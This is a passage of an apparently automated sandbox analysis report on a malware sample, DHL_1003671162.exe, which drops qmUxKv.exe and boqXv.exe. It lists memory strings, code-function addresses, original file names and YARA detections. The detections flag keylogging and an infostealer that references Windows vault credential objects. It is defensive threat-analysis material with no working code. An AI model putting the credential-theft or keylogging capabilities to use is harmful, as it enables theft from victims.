                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: DHL_1003671162.exe, 00000000.00000002.1693256058.0000000003A08000.00000004.00000800.00020000.00000000.sdmp, qmUxKv.exe, 00000007.00000002.1732952396.000000000486F000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000010.00000002.1894023046.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, umlRMRbjNqD.cs.Net Code: fKv0R
                      Source: 0.2.DHL_1003671162.exe.3a09970.8.raw.unpack, umlRMRbjNqD.cs.Net Code: fKv0R

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 7.2.qmUxKv.exe.486f5a0.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.qmUxKv.exe.48aa5c0.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 16.2.boqXv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL_1003671162.exe.3a09970.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.qmUxKv.exe.486f5a0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.qmUxKv.exe.48aa5c0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL_1003671162.exe.3a09970.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      .NET source code contains very large array initializations
                      Source: 0.2.DHL_1003671162.exe.7190000.10.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_0289D98C0_2_0289D98C
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B67980_2_071B6798
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B95280_2_071B9528
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B45F80_2_071B45F8
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B98300_2_071B9830
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B58D80_2_071B58D8
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B67150_2_071B6715
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B67560_2_071B6756
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071BA7B10_2_071BA7B1
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071BA7C00_2_071BA7C0
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B76780_2_071B7678
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B76880_2_071B7688
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B66F90_2_071B66F9
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B95190_2_071B9519
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B85310_2_071B8531
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B45600_2_071B4560
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B4E700_2_071B4E70
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071BBED70_2_071BBED7
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071BDEC10_2_071BDEC1
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071BBEE80_2_071BBEE8
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B3AD80_2_071B3AD8
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B8AE80_2_071B8AE8
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B88B00_2_071B88B0
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B88A00_2_071B88A0
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_0AE81F280_2_0AE81F28
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_0AE8CDE00_2_0AE8CDE0
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_0AE8AD940_2_0AE8AD94
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_0AE84BE00_2_0AE84BE0
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_0AE873D00_2_0AE873D0
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_0AE858880_2_0AE85888
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_0AE850180_2_0AE85018
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_0AE81F180_2_0AE81F18
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_0AE854410_2_0AE85441
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_0AE854500_2_0AE85450
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_014BA3D86_2_014BA3D8
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_014BD6586_2_014BD658
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_014B98106_2_014B9810
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_014B4AD06_2_014B4AD0
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_014B3EB86_2_014B3EB8
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_014B42006_2_014B4200
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_05A08A686_2_05A08A68
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_05A0B7F86_2_05A0B7F8
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_05A09F7C6_2_05A09F7C
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_062C9F806_2_062C9F80
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_062C5B806_2_062C5B80
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_062C33986_2_062C3398
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_062C43F86_2_062C43F8
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_062C90386_2_062C9038
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_062C00406_2_062C0040
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_062CC1A06_2_062CC1A0
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_062CE1A06_2_062CE1A0
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_062C54A06_2_062C54A0
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 6_2_062C3AF06_2_062C3AF0
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_012AD98C7_2_012AD98C
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_04C29F187_2_04C29F18
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_04C21F287_2_04C21F28
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_04C257587_2_04C25758
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_04C272A07_2_04C272A0
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_04C253117_2_04C25311
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_04C253207_2_04C25320
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_04C24EE87_2_04C24EE8
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_04C21F197_2_04C21F19
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_04C24AB07_2_04C24AB0
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC67987_2_06FC6798
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC45F87_2_06FC45F8
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC95287_2_06FC9528
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC58D87_2_06FC58D8
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC98307_2_06FC9830
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC66F97_2_06FC66F9
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC76887_2_06FC7688
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC76787_2_06FC7678
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FCA7C07_2_06FCA7C0
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FCA7B17_2_06FCA7B1
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC67567_2_06FC6756
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC67157_2_06FC6715
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC45607_2_06FC4560
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC85317_2_06FC8531
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC95197_2_06FC9519
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC53387_2_06FC5338
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FCE0007_2_06FCE000
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FCE1BC7_2_06FCE1BC
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FCBEE87_2_06FCBEE8
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FCBED77_2_06FCBED7
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC4E817_2_06FC4E81
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FCDFF17_2_06FCDFF1
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC4C797_2_06FC4C79
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC8AE87_2_06FC8AE8
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC3AD87_2_06FC3AD8
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC88B07_2_06FC88B0
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC88A07_2_06FC88A0
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_02EAD65011_2_02EAD650
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_02EAA49011_2_02EAA490
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_02EA4AD011_2_02EA4AD0
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_02EA981011_2_02EA9810
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_02EA3EB811_2_02EA3EB8
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_02EA420011_2_02EA4200
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_02EAA48211_2_02EAA482
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_06419D5411_2_06419D54
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_06429F8011_2_06429F80
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_064243F811_2_064243F8
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_06425B8011_2_06425B80
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_0642339811_2_06423398
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_0642004011_2_06420040
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_0642903811_2_06429038
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_0642C1A011_2_0642C1A0
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_0642E1A011_2_0642E1A0
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_064254A011_2_064254A0
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 11_2_06423AF011_2_06423AF0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_016DD98C12_2_016DD98C
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_032B1F2812_2_032B1F28
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_032B9F2812_2_032B9F28
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_032BBDD812_2_032BBDD8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_032B532012_2_032B5320
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_032B531112_2_032B5311
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_032B72A012_2_032B72A0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_032B575812_2_032B5758
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_032B4AB012_2_032B4AB0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_032B1F1912_2_032B1F19
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_032B9F1812_2_032B9F18
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_032B4EE812_2_032B4EE8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A679812_2_077A6798
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A952812_2_077A9528
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A45F812_2_077A45F8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A984012_2_077A9840
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A58E812_2_077A58E8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A671712_2_077A6717
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077AA7C012_2_077AA7C0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077AA7B112_2_077AA7B1
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A767812_2_077A7678
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A66A812_2_077A66A8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A768812_2_077A7688
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A456012_2_077A4560
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A854012_2_077A8540
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A853112_2_077A8531
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A951912_2_077A9519
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A534812_2_077A5348
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A533812_2_077A5338
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077AE1BC12_2_077AE1BC
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077AE00012_2_077AE000
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077ABEE812_2_077ABEE8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077ABED712_2_077ABED7
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A4E8012_2_077A4E80
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A3AE812_2_077A3AE8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A8AE812_2_077A8AE8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A3AD812_2_077A3AD8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A983012_2_077A9830
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A58D812_2_077A58D8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A88B012_2_077A88B0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A88A012_2_077A88A0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0327D34916_2_0327D349
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_032796F016_2_032796F0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_03274AD016_2_03274AD0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_03279EA816_2_03279EA8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_03273EB816_2_03273EB8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0327420016_2_03274200
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696B40016_2_0696B400
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_06969DCC16_2_06969DCC
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_06979F8016_2_06979F80
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0697339816_2_06973398
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_06975B8016_2_06975B80
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_069743F816_2_069743F8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0697903816_2_06979038
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0697004016_2_06970040
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0697E1A016_2_0697E1A0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_069754A016_2_069754A0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_06973AF016_2_06973AF0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0697C1A016_2_0697C1A0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 17_2_025BD98C17_2_025BD98C
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 17_2_07B8C08817_2_07B8C088
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 17_2_07B8A05017_2_07B8A050
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 17_2_07B81F2817_2_07B81F28
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 17_2_07B8545017_2_07B85450
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 17_2_07B8544117_2_07B85441
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 17_2_07B873D017_2_07B873D0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 17_2_07B8501817_2_07B85018
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 17_2_07B8A04017_2_07B8A040
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 17_2_07B81F1817_2_07B81F18
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 17_2_07B84BE017_2_07B84BE0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 17_2_07B8588817_2_07B85888
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_0320D12820_2_0320D128
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_03204AD020_2_03204AD0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_03209EA820_2_03209EA8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_03203EB820_2_03203EB8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_0320420020_2_03204200
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_0686B65820_2_0686B658
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_06869DCC20_2_06869DCC
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_06879F8020_2_06879F80
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_06875B8020_2_06875B80
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_0687339820_2_06873398
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_068743F820_2_068743F8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_0687902A20_2_0687902A
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_0687004020_2_06870040
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_0687E19020_2_0687E190
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_068754A020_2_068754A0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_06873ADB20_2_06873ADB
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_0687C1A020_2_0687C1A0
                      Source: DHL_1003671162.exe, 00000000.00000002.1704965625.0000000007190000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs DHL_1003671162.exe
                      Source: DHL_1003671162.exe, 00000000.00000002.1693256058.0000000003A08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename9e4810db-acaa-47dc-a281-6153255fd520.exe4 vs DHL_1003671162.exe
                      Source: DHL_1003671162.exe, 00000000.00000002.1707261132.000000000B170000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DHL_1003671162.exe
                      Source: DHL_1003671162.exe, 00000000.00000002.1689302752.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL_1003671162.exe
                      Source: DHL_1003671162.exe, 00000000.00000002.1690593567.0000000002A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename9e4810db-acaa-47dc-a281-6153255fd520.exe4 vs DHL_1003671162.exe
                      Source: DHL_1003671162.exe, 00000000.00000002.1693256058.00000000043DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DHL_1003671162.exe
                      Source: DHL_1003671162.exe, 00000000.00000000.1662439926.0000000000542000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameelby.exe0 vs DHL_1003671162.exe
                      Source: DHL_1003671162.exe, 00000006.00000002.2924858625.0000000000F88000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs DHL_1003671162.exe
                      Source: DHL_1003671162.exeBinary or memory string: OriginalFilenameelby.exe0 vs DHL_1003671162.exe
                      Source: DHL_1003671162.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 7.2.qmUxKv.exe.486f5a0.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.qmUxKv.exe.48aa5c0.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 16.2.boqXv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL_1003671162.exe.3a09970.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.qmUxKv.exe.486f5a0.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
